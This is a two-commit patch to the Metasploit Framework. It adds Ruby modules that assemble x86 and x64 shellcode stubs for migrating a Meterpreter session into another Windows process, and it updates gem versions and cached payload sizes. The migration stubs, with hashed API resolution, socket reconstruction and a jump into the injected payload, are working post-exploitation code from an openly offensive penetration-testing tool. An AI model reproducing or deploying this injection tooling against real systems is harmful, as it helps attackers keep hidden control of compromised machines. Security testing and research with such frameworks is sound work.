From d0696a09ada18f2f28a9dbc49cc8148368e0e314 Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 8 Dec 2016 16:01:13 +1000 Subject: [PATCH 1/2] Move migration stub generation into MSF This code adds support for transport-specific migration stubs to be generated in MSF rather than having them hard-coded in Meterpreter. --- lib/msf/core/payload/transport_config.rb | 44 +++++----- lib/msf/core/payload/windows/migrate.rb | 5 ++ .../core/payload/windows/migrate_common.rb | 49 +++++++++++ lib/msf/core/payload/windows/migrate_http.rb | 40 +++++++++ lib/msf/core/payload/windows/migrate_tcp.rb | 68 +++++++++++++++ lib/msf/core/payload/windows/x64/migrate.rb | 5 ++ .../payload/windows/x64/migrate_common.rb | 50 +++++++++++ .../core/payload/windows/x64/migrate_http.rb | 41 +++++++++ .../core/payload/windows/x64/migrate_tcp.rb | 71 ++++++++++++++++ lib/rex/post/meterpreter/client_core.rb | 83 ++++++++++++++----- lib/rex/post/meterpreter/packet.rb | 4 +- 11 files changed, 418 insertions(+), 42 deletions(-) create mode 100644 lib/msf/core/payload/windows/migrate.rb create mode 100644 lib/msf/core/payload/windows/migrate_common.rb create mode 100644 lib/msf/core/payload/windows/migrate_http.rb create mode 100644 lib/msf/core/payload/windows/migrate_tcp.rb create mode 100644 lib/msf/core/payload/windows/x64/migrate.rb create mode 100644 lib/msf/core/payload/windows/x64/migrate_common.rb create mode 100644 lib/msf/core/payload/windows/x64/migrate_http.rb create mode 100644 lib/msf/core/payload/windows/x64/migrate_tcp.rb diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 6e696e07f9..b239aec7a2 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -25,13 +25,10 @@ module Msf::Payload::TransportConfig def transport_config_bind_tcp(opts={}) { - :scheme => 'tcp', - :lhost => datastore['LHOST'], - :lport => datastore['LPORT'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i - } + scheme: 'tcp', + lhost: datastore['LHOST'], + lport: datastore['LPORT'].to_i + }.merge(timeout_config) end def transport_config_reverse_https(opts={}) @@ -54,19 +51,26 @@ module Msf::Payload::TransportConfig end { - :scheme => 'http', - :lhost => opts[:lhost] || datastore['LHOST'], - :lport => (opts[:lport] || datastore['LPORT']).to_i, - :uri => uri, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ua => datastore['MeterpreterUserAgent'], - :proxy_host => datastore['PayloadProxyHost'], - :proxy_port => datastore['PayloadProxyPort'], - :proxy_type => datastore['PayloadProxyType'], - :proxy_user => datastore['PayloadProxyUser'], - :proxy_pass => datastore['PayloadProxyPass'] + scheme: 'http', + lhost: opts[:lhost] || datastore['LHOST'], + lport: (opts[:lport] || datastore['LPORT']).to_i, + uri: uri, + ua: datastore['MeterpreterUserAgent'], + proxy_host: datastore['PayloadProxyHost'], + proxy_port: datastore['PayloadProxyPort'], + proxy_type: datastore['PayloadProxyType'], + proxy_user: datastore['PayloadProxyUser'], + proxy_pass: datastore['PayloadProxyPass'] + }.merge(timeout_config) + end + +private + + def timeout_config + { + comm_timeout: datastore['SessionCommunicationTimeout'].to_i, + retry_total: datastore['SessionRetryTotal'].to_i, + retry_wait: datastore['SessionRetryWait'].to_i } end diff --git a/lib/msf/core/payload/windows/migrate.rb b/lib/msf/core/payload/windows/migrate.rb new file mode 100644 index 0000000000..f9b924780e --- /dev/null +++ b/lib/msf/core/payload/windows/migrate.rb @@ -0,0 +1,5 @@ +# -*- coding: binary -*- + +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/migrate_tcp' +require 'msf/core/payload/windows/migrate_http' diff --git a/lib/msf/core/payload/windows/migrate_common.rb b/lib/msf/core/payload/windows/migrate_common.rb new file mode 100644 index 0000000000..1cb3a5e148 --- /dev/null +++ b/lib/msf/core/payload/windows/migrate_common.rb @@ -0,0 +1,49 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/block_api' + +module Msf + +### +# +# Not really a payload, but more a mixin that lets common functionality +# live in spot that makes sense, so that code duplication is reduced. +# +### + +module Payload::Windows::MigrateCommon + + include Msf::Payload::Windows + include Msf::Payload::Windows::BlockApi + + # + # Constructs the migrate stub on the fly + # + def generate(opts={}) + asm = %Q^ + migrate: + cld + pop esi + pop esi ; esi now contains the pointer to the migrate context + sub esp, 0x2000 + call start + #{asm_block_api} + start: + pop ebp + #{generate_migrate(opts)} + signal_event: + push dword [esi] ; Event handle is pointed at by esi + push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call ebp ; SetEvent(handle) + call_payload: + call dword [esi+8] ; Invoke the associated payload + ^ + + Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string + end + +end + +end + diff --git a/lib/msf/core/payload/windows/migrate_http.rb b/lib/msf/core/payload/windows/migrate_http.rb new file mode 100644 index 0000000000..124c0ddd7d --- /dev/null +++ b/lib/msf/core/payload/windows/migrate_http.rb @@ -0,0 +1,40 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migration over HTTP/S transports on x86. +# +### + +module Payload::Windows::MigrateHttp + + include Msf::Payload::Windows::MigrateCommon + + def initialize(info={}) + super(update_info(info, + 'Name' => 'HTTP/S Transport Migration (x86)', + 'Description' => 'Migration stub to use over HTTP/S transports via x86', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86 + )) + end + + # + # Constructs the migrate stub on the fly + # + def generate_migrate(opts={}) + # This payload only requires the common features, so return + # an empty string indicating no code requires. + '' + end + +end + +end diff --git a/lib/msf/core/payload/windows/migrate_tcp.rb b/lib/msf/core/payload/windows/migrate_tcp.rb new file mode 100644 index 0000000000..f9b82513b1 --- /dev/null +++ b/lib/msf/core/payload/windows/migrate_tcp.rb @@ -0,0 +1,68 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migration over the TCP transport on x86. +# +### + +module Payload::Windows::MigrateTcp + + include Msf::Payload::Windows::MigrateCommon + + WSA_VERSION = 0x190 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'TCP Transport Migration (x86)', + 'Description' => 'Migration stub to use over the TCP transport via x86', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86 + )) + end + + # + # Constructs the migrate stub on the fly + # + def generate_migrate(opts={}) + %Q^ + load_ws2_32: + push '32' + push 'ws2_' + push esp ; pointer to 'ws2_32' + push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + call ebp ; LoadLibraryA('ws2_32') + init_networking: + mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size + sub esp, eax ; allocate space for the WSAData structure + push esp ; Pointer to the WSAData structure + push eax ; Version required + push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + call ebp ; WSAStartup(Version, &WSAData) + create_socket: + push eax ; eax is 0 on success, use it for flags + push eax ; reserved + lea ebx, [esi+0x10] ; get offset to the WSAPROTOCOL_INFO struct + push ebx ; pass the info struct address + push eax ; no protocol is specified + inc eax + push eax ; SOCK_STREAM + inc eax + push eax ; AF_INET + push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) + xchg edi, eax + ^ + end + +end + +end + diff --git a/lib/msf/core/payload/windows/x64/migrate.rb b/lib/msf/core/payload/windows/x64/migrate.rb new file mode 100644 index 0000000000..20fad5bb2d --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate.rb @@ -0,0 +1,5 @@ +# -*- coding: binary -*- + +require 'msf/core/payload/windows/x64/block_api' +require 'msf/core/payload/windows/x64/migrate_tcp' +require 'msf/core/payload/windows/x64/migrate_http' diff --git a/lib/msf/core/payload/windows/x64/migrate_common.rb b/lib/msf/core/payload/windows/x64/migrate_common.rb new file mode 100644 index 0000000000..81230616e7 --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate_common.rb @@ -0,0 +1,50 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/x64/block_api' + +module Msf + +### +# +# Not really a payload, but more a mixin that lets common functionality +# live in spot that makes sense, so that code duplication is reduced. +# +### + +module Payload::Windows::MigrateCommon_x64 + + include Msf::Payload::Windows + include Msf::Payload::Windows::BlockApi_x64 + + # + # Constructs the migrate stub on the fly + # + def generate(opts={}) + asm = %Q^ + migrate: + cld + mov rsi, rcx + sub rsp, 0x2000 + and rsp, ~0xF + call start + #{asm_block_api} + start: + pop rbp + #{generate_migrate(opts)} + signal_event: + mov rcx, qword [rsi] ; Event handle is pointed at by rsi + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call rbp ; SetEvent(handle) + call_payload: + call qword [rsi+8] ; Invoke the associated payload + ^ + + Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string + end + +end + +end + + diff --git a/lib/msf/core/payload/windows/x64/migrate_http.rb b/lib/msf/core/payload/windows/x64/migrate_http.rb new file mode 100644 index 0000000000..631d3f3b9f --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate_http.rb @@ -0,0 +1,41 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/x64/block_api' + +module Msf + +### +# +# Payload that supports migration over HTTP/S transports on x64. +# +### + +module Payload::Windows::MigrateHttp_x64 + + include Msf::Payload::Windows::MigrateCommon_x64 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'HTTP/S Transport Migration (x64)', + 'Description' => 'Migration stub to use over HTTP/S transports via x64', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X64 + )) + end + + # + # Constructs the migrate stub on the fly + # + def generate_migrate(opts={}) + # This payload only requires the common features, so return + # an empty string indicating no code requires. + '' + end + +end + +end + diff --git a/lib/msf/core/payload/windows/x64/migrate_tcp.rb b/lib/msf/core/payload/windows/x64/migrate_tcp.rb new file mode 100644 index 0000000000..fc70b083fb --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate_tcp.rb @@ -0,0 +1,71 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/x64/migrate_common' + +module Msf + +### +# +# Payload that supports migration over the TCP transport on x64. +# +### + +module Payload::Windows::MigrateTcp_x64 + + include Msf::Payload::Windows::MigrateCommon_x64 + + # Minimum size, plus bytes for alignment + WSA_SIZE = 0x1A0 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'TCP Transport Migration (x64)', + 'Description' => 'Migration stub to use over the TCP transport via x64', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X64 + )) + end + + # + # Constructs the migrate stub on the fly + # + def generate_migrate(opts={}) + %Q^ + load_ws2_32: + mov r14, 'ws2_32' + push r14 + mov rcx, rsp ; pointer to 'ws2_32' + sub rsp, #{WSA_SIZE} ; alloc size, plus alignment (used later) + mov r13, rsp ; save pointer to this struct + sub rsp, 0x28 ; space for api function calls (really?) + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + call rbp ; LoadLibraryA('ws2_32') + init_networking: + mov rdx, r13 ; pointer to the wsadata struct + push 2 + pop rcx ; Version = 2 + mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + call rbp ; WSAStartup(Version, &WSAData) + create_socket: + xor r8, r8 ; protocol not specified + push r8 ; flags == 0 + push r8 ; reserved == NULL + lea r9, [rsi+0x10] ; Pointer to the info in the migration context + push 1 + pop rdx ; SOCK_STREAM + push 2 + pop rcx ; AF_INET + mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + call rbp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) + xchg rdi, rax + ^ + end + +end + +end + + diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index d86c1281d3..cc00ff8866 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -7,6 +7,8 @@ require 'rex/post/meterpreter/client' # Used to generate a reflective DLL when migrating. This is yet another # argument for moving the meterpreter client into the Msf namespace. require 'msf/core/payload/windows' +require 'msf/core/payload/windows/migrate' +require 'msf/core/payload/windows/x64/migrate' # URI uuid and checksum stuff require 'msf/core/payload/uuid' @@ -479,7 +481,8 @@ class ClientCore < Extension # Rex::Post::FileStat#writable? isn't available end - blob = generate_payload_stub(target_process) + migrate_stub = generate_migrate_stub(target_process) + migrate_payload = generate_migrate_payload(target_process) # Build the migration request request = Packet.create_request('core_migrate') @@ -491,23 +494,25 @@ class ClientCore < Extension raise RuntimeError, 'The writable dir is too long', caller end - pos = blob.index(DEFAULT_SOCK_PATH) + pos = migrate_payload.index(DEFAULT_SOCK_PATH) if pos.nil? raise RuntimeError, 'The meterpreter binary is wrong', caller end - blob[pos, socket_path.length + 1] = socket_path + "\x00" + migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00" - ep = elf_ep(blob) + ep = elf_ep(migrate_payload) request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000) request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep) request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib]) end request.add_tlv( TLV_TYPE_MIGRATE_PID, target_pid ) - request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length ) - request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib]) + request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length ) + request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) + request.add_tlv( TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length ) + request.add_tlv( TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib]) if target_process['arch'] == ARCH_X64 request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64 @@ -604,7 +609,47 @@ class ClientCore < Extension end end - private +private + + def get_current_transport + transport_list[:transports][0] + end + + def generate_migrate_stub(target_process) + stub = nil + + if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch) + t = get_current_transport + + c = Class.new(::Msf::Payload) + + if target_process['arch'] == ARCH_X86 + c.include(::Msf::Payload::Windows::BlockApi) + case t[:url] + when /^tcp/i + c.include(::Msf::Payload::Windows::MigrateTcp) + when /^http/i + # Covers HTTP and HTTPS + c.include(::Msf::Payload::Windows::MigrateHttp) + end + else + c.include(::Msf::Payload::Windows::BlockApi_x64) + case t[:url] + when /^tcp/i + c.include(::Msf::Payload::Windows::MigrateTcp_x64) + when /^http/i + # Covers HTTP and HTTPS + c.include(::Msf::Payload::Windows::MigrateHttp_x64) + end + end + + stub = c.new().generate + else + raise RuntimeError, "Unsupported session #{client.session_type}" + end + + stub + end def transport_prepare_request(method, opts={}) unless valid_transport?(opts[:transport]) && opts[:lport] @@ -694,12 +739,12 @@ class ClientCore < Extension end - def generate_payload_stub(process) + def generate_migrate_payload(target_process) case client.platform when 'windows' - blob = generate_windows_stub(process) + blob = generate_migrate_windows_payload(target_process) when 'linux' - blob = generate_linux_stub + blob = generate_migrate_linux_payload else raise RuntimeError, "Unsupported platform '#{client.platform}'" end @@ -707,31 +752,27 @@ class ClientCore < Extension blob end - def generate_windows_stub(process) + def generate_migrate_windows_payload(target_process) c = Class.new( ::Msf::Payload ) c.include( ::Msf::Payload::Stager ) # Include the appropriate reflective dll injection module for the target process architecture... - if process['arch'] == ARCH_X86 + if target_process['arch'] == ARCH_X86 c.include( ::Msf::Payload::Windows::MeterpreterLoader ) - elsif process['arch'] == ARCH_X64 + elsif target_process['arch'] == ARCH_X64 c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 ) else - raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller + raise RuntimeError, "Unsupported target architecture '#{target_process['arch']}' for process '#{target_process['name']}'.", caller end # Create the migrate stager migrate_stager = c.new() - blob = migrate_stager.stage_meterpreter - - blob + migrate_stager.stage_meterpreter end - def generate_linux_stub - blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - - blob + def generate_migrate_linux_payload + MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') end def elf_ep(payload) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 372324381f..97b485add8 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -80,12 +80,14 @@ TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301 TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400 TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401 TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402 -TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403 +TLV_TYPE_MIGRATE_PAYLOAD_LEN = TLV_META_TYPE_UINT | 403 TLV_TYPE_MIGRATE_PAYLOAD = TLV_META_TYPE_STRING | 404 TLV_TYPE_MIGRATE_ARCH = TLV_META_TYPE_UINT | 405 TLV_TYPE_MIGRATE_BASE_ADDR = TLV_META_TYPE_UINT | 407 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT | 408 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409 +TLV_TYPE_MIGRATE_STUB_LEN = TLV_META_TYPE_UINT | 410 +TLV_TYPE_MIGRATE_STUB = TLV_META_TYPE_STRING | 411 TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430 From ea704211ca5d3f17447bcb4808fc54a02b8ea55f Mon Sep 17 00:00:00 2001 From: William Webb Date: Thu, 22 Dec 2016 17:50:43 -0600 Subject: [PATCH 2/2] incorporate payload stub generation changes --- Gemfile.lock | 14 +++++++------- metasploit-framework.gemspec | 2 +- .../singles/windows/meterpreter_bind_tcp.rb | 2 +- .../singles/windows/meterpreter_reverse_http.rb | 2 +- .../singles/windows/meterpreter_reverse_https.rb | 2 +- .../windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../singles/windows/meterpreter_reverse_tcp.rb | 2 +- .../singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../windows/x64/meterpreter_reverse_http.rb | 2 +- .../windows/x64/meterpreter_reverse_https.rb | 2 +- .../windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- 12 files changed, 18 insertions(+), 18 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index bdbbe32534..e9a81cc215 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -14,7 +14,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.4) + metasploit-payloads (= 1.2.5) metasploit_data_models metasploit_payloads-mettle (= 0.1.3) msgpack @@ -135,10 +135,10 @@ GEM diff-lcs (1.2.5) docile (1.1.5) erubis (2.7.0) - factory_girl (4.7.0) + factory_girl (4.8.0) activesupport (>= 3.0.0) - factory_girl_rails (4.7.0) - factory_girl (~> 4.7.0) + factory_girl_rails (4.8.0) + factory_girl (~> 4.8.0) railties (>= 3.0.0) faraday (0.10.0) multipart-post (>= 1.2, < 3) @@ -169,7 +169,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.4) + metasploit-payloads (1.2.5) metasploit_data_models (2.0.10) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -232,7 +232,7 @@ GEM activesupport (= 4.2.7.1) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (11.3.0) + rake (12.0.0) rb-readline-r7 (0.5.2.0) recog (2.1.2) nokogiri @@ -250,7 +250,7 @@ GEM metasm rex-arch rex-text - rex-exploitation (0.1.3) + rex-exploitation (0.1.4) jsobfu metasm rex-arch diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 5572254f79..998c0db215 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -65,7 +65,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.4' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.5' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.3' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 4aba839b4d..c0f9db83dc 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 957999 + CachedSize = 957487 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 9b1ac80418..0e6200bd6b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 959043 + CachedSize = 958531 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 91b073a44b..5445a70a8b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 959043 + CachedSize = 958531 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 8cdbd91f25..f90b20afd2 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 957999 + CachedSize = 957487 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index e2c6f3a72b..b7df1b5d26 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 957999 + CachedSize = 957487 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 3633b8036f..493bfbf557 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 1189935 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 329fd56d11..ee87c288fe 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 1190979 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index e65314a9dc..43d0262094 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 1190979 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index cb357b97cc..1ffc004cee 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 1189935 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index db6d7e57a1..01b46f82fc 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 1189935 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows